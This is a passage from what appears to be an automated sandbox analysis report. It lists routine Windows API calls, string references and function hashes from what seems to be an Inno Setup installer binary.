• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
• ExitProcess.KERNEL32 ref: 00404E0D
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: ExitMessageProcess
• String ID: Error$Runtime error at 00000000
• API String ID: 1220098344-2970929446
• Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
• Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
• Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
• Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
APIs
  • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
  • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
  • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
• LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456C50
• RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456C7D
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
• String ID: LoadTypeLib$RegisterTypeLib
• API String ID: 1312246647-2435364021
• Opcode ID: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
• Instruction ID: 3ed1135b8019c5f4588910a0035f5c9e1cabb82a18fedb82429c118dce795412
• Opcode Fuzzy Hash: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
• Instruction Fuzzy Hash: 2911B430B00604AFDB02EFA6CD51A5EB7BDEB89705F5184B6FC44D3752DA389904CA24
APIs
• SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 0045716E
• SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045720B
Strings
• Failed to create DebugClientWnd, xrefs: 004571D4
• Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 0045719A
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: MessageSend
• String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
• API String ID: 3850602802-3720027226
• Opcode ID: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
• Instruction ID: a6ca84080c04e90ac639e3db27cd2c1e4b46fe4ea5f20cae781d9f83c3d7e460
• Opcode Fuzzy Hash: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
• Instruction Fuzzy Hash: 1011E770248240AFD710AB69AC85B5FBBD89B54319F15407AFA849B383D7798C18C7AE
APIs
  • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
• GetFocus.USER32 ref: 00478757
• GetKeyState.USER32(0000007A), ref: 00478769
• WaitMessage.USER32(?,00000000,00478790,?,00000000,004787B7,?,?,00000001,00000000,?,?,?,00480402,00000000,004812C8), ref: 00478773
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: FocusMessageStateTextWaitWindow
• String ID: Wnd=$%x
• API String ID: 1381870634-2927251529
• Opcode ID: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
• Instruction ID: f17a5035e7dee30901ec9a03c3a5a372f1d0714b29ccd98a4f066b2945bd060b
• Opcode Fuzzy Hash: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
• Instruction Fuzzy Hash: CE11C634A40244AFD704EF65DC49A9EBBF8EB49314F6184BFF409E7681DB386D00CA69
APIs
• FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E618
• FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E627
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Time$File$LocalSystem
• String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
• API String ID: 1748579591-1013271723
• Opcode ID: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
• Instruction ID: 5dd65cae4c1adac9d47cc9ad6336eda1851498fedff4a8a979bd050f9c4a6815
• Opcode Fuzzy Hash: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
• Instruction Fuzzy Hash: A81136A440C3909ED340DF2AC04432BBAE4AB99704F44892EF8C8C6381E779C848DBB7
APIs
• SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F83
  • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
• MoveFileA.KERNEL32(00000000,00000000), ref: 00453FA8
  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: File$AttributesDeleteErrorLastMove
• String ID: DeleteFile$MoveFile
• API String ID: 3024442154-139070271
• Opcode ID: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
• Instruction ID: b5871bee3d194af1fa843ac656f6d820fc0ba16d57580c91db5694710367c43f
• Opcode Fuzzy Hash: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
• Instruction Fuzzy Hash: AEF062716142045BD701FBA2D84266EA7ECDB8435EF60443BB900BB6C3DA3C9E094529
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: CloseOpen
• String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
• API String ID: 47109696-2631785700
• Opcode ID: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
• Instruction ID: 1950c6f853cc10ed35e504d9d8503a730f6ffd27dc9bba4e9fa27fab35675349
• Opcode Fuzzy Hash: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
• Instruction Fuzzy Hash: 12F0AF31300110DBCB10EB9AD885B6F6299DB9931AF50503BF981DB293E73CCC168629
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C05
• RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C28
Strings
• System\CurrentControlSet\Control\Windows, xrefs: 00483BD2
• CSDVersion, xrefs: 00483BFC
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: CSDVersion$System\CurrentControlSet\Control\Windows
• API String ID: 3677997916-1910633163
• Opcode ID: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
• Instruction ID: 1d850e848a14c5c59b8e95f13e5f63a8fb365af486cc5d6c9f9b701d22fca986
• Opcode Fuzzy Hash: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
• Instruction Fuzzy Hash: 56F03176E40208A6DF10EAD48C45BAFB3BCAB14B05F104967EA10F7280E678AB048B59
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetSystemWow64DirectoryA$kernel32.dll
• API String ID: 1646373207-4063490227
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAD0), ref: 0042EB62
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB68
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: ShutdownBlockReasonDestroy$user32.dll
• API String ID: 1646373207-260599015
APIs
• GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: NotifyWinEvent$user32.dll
• API String ID: 1646373207-597752486
APIs
• GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: DisableProcessWindowsGhosting$user32.dll
• API String ID: 1646373207-834958232
APIs
  • Part of subcall function 0044B658: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
  • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
• LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
• GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: SHPathPrepareForWriteA$shell32.dll
• API String ID: 2238633743-2683653824
APIs
• FindNextFileA.KERNEL32(000000FF,?,00000000,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54), ref: 0047D7CC
• FindClose.KERNEL32(000000FF,0047D7F7,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54,00000000), ref: 0047D7EA
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Find$CloseFileNext
• String ID:
• API String ID: 2066263336-0
APIs
  • Part of subcall function 0042EE30: GetTickCount.KERNEL32 ref: 0042EE36
  • Part of subcall function 0042EC88: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECBD
• GetLastError.KERNEL32(00000000,00475721,?,?,0049C1E0,00000000), ref: 0047560A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: CountErrorFileLastMoveTick
• String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
• API String ID: 2406187244-2685451598
APIs
• GetDesktopWindow.USER32 ref: 00413D46
• GetDesktopWindow.USER32 ref: 00413DFE
  • Part of subcall function 00418EC0: 6FDEC6F0.COMCTL32(?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EDC
  • Part of subcall function 00418EC0: ShowCursor.USER32(00000001,?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EF9
• SetCursor.USER32(00000000,?,?,?,?,00413AF3,00000000,00413B06), ref: 00413E3C
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CursorDesktopWindow$Show
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2074268717-0
                                                                                                                                        • Opcode ID: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                                                                        • Instruction ID: d0219f8535474b9b7e790bb207accfb6dce16a9ac66decbe361331da1304c66b
                                                                                                                                        • Opcode Fuzzy Hash: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                                                                        • Instruction Fuzzy Hash: 91412C75600210AFC710DF2AFA84B56B7E1EB65329B16817BE405CB365DB38DD81CF98
APIs
• GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A75
• LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AE4
• LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B7F
• MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BBE
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: LoadString$FileMessageModuleName
• String ID:
• API String ID: 704749118-0
• Opcode ID: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
• Instruction ID: 7d65b0a5aa49ad722f3f3263bbe29e3330acee4661d9e2153cfe083702b22da2
• Opcode Fuzzy Hash: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
• Instruction Fuzzy Hash: 1F3123716083849AD370EB65C945BDF77D89B85704F40483FB6C8E72D1EB7859048B6B
APIs
• SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E90D
  • Part of subcall function 0044CF50: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF82
• InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E991
  • Part of subcall function 0042BBB4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC8
• IsRectEmpty.USER32(?), ref: 0044E953
• ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E976
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
• String ID:
• API String ID: 855768636-0
• Opcode ID: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
• Instruction ID: f7bad605b8f68185b4e834990bb8ca2287257270a928060092b59a923d315d7c
• Opcode Fuzzy Hash: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
• Instruction Fuzzy Hash: E5114A71B0030067E650BA7B8C86B5B76C9AB88748F15083FB545EB387DE7DDD094299
APIs
• OffsetRect.USER32(?,?,00000000), ref: 00495988
• OffsetRect.USER32(?,00000000,?), ref: 004959A3
• OffsetRect.USER32(?,?,00000000), ref: 004959BD
• OffsetRect.USER32(?,00000000,?), ref: 004959D8
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: OffsetRect
• String ID:
• API String ID: 177026234-0
• Opcode ID: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
• Instruction ID: 9409249b62c1188f54b5b62e2685c04785358b71117f53a2337039625fc08c68
• Opcode Fuzzy Hash: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
• Instruction Fuzzy Hash: 1121AEB6700701AFDB00DE69CD81E5BB7DAEFC4350F248A2AF944C3249D638ED048761
APIs
• GetCursorPos.USER32 ref: 00417260
• SetCursor.USER32(00000000), ref: 004172A3
• GetLastActivePopup.USER32(?), ref: 004172CD
• GetForegroundWindow.USER32(?), ref: 004172D4
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Cursor$ActiveForegroundLastPopupWindow
• String ID:
• API String ID: 1959210111-0
• Opcode ID: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
• Instruction ID: de3f0dc6b436800086b9427ec8ddd2ec86eeedce3a35093462374e80c8eda50e
• Opcode Fuzzy Hash: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
• Instruction Fuzzy Hash: C52183313086118AD720AFA9E945AE733F1EF44754B0544ABF8558B352DB3DDC82CB9E
APIs
• MulDiv.KERNEL32(?,00000008,?), ref: 004955F1
• MulDiv.KERNEL32(?,00000008,?), ref: 00495605
• MulDiv.KERNEL32(?,00000008,?), ref: 00495619
• MulDiv.KERNEL32(?,00000008,?), ref: 00495637
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
• Instruction ID: b77f8f3c6746ea581d036ce488ab013aedd37a602364075716cddbfd1b85439e
• Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
